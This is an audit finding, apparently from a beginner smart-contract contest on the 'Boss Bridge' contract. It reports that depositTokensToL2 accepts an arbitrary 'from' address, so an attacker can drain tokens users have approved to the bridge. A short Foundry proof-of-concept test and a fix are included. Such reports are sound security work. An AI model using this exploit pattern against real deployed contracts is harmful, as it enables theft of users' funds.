First Flight #4: Boss Bridge
First Flight #4
Beginner FriendlyFoundryBridge
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Users can have their allowed funds drained immediately after approval.

ararara

Summary

Any approved funds can front run and drained to the attackers L2 address.

Vulnerability Details

A malicious actor can monitor events in the mempool and when they see an approval to the Bossbridge contract they can steal all the approved tokens by calling the depositTokensToL2(...) function with themselves as the recipient.

PoC:

function testDepositAllowanceExploit() public{
vm.startPrank(user);
token.mint(user_initial_amount);
//aprove MAX token instance
token.approve(address(tokenBridge),type(uint).max);
vm.stopPrank();
//attacker monitors mempool, sees approval, and quickly sends this transaction
vm.prank(attacker);
//expect deposit event to emit with attacker as recipient.
vm.expectEmit(true, true, false, true); //
emit Deposit(user, attacker, user_initial_amount);
tokenBridge.depositTokensToL2(user,attacker,user_initial_amount);
//User's funds are drained, attacker has drained the users balance to their own address on L2.
assertEq(token.balanceOf(user),0);
}

Impact

High impact. This is a critical issue and will result in anyone who sets an approval to the bridge contract to have a very high risk of having their funds stolen.

Tools Used

Manual review
Foundry integration tests

Recommendations

the simplest way to deal with this issue is to restrict caller to the token owner in the depositTokensToL2(...) function

require(msg.sender == from, "L1BossBridge: Caller must be token owner");
Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

depositTokensToL2(): abitrary from address

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.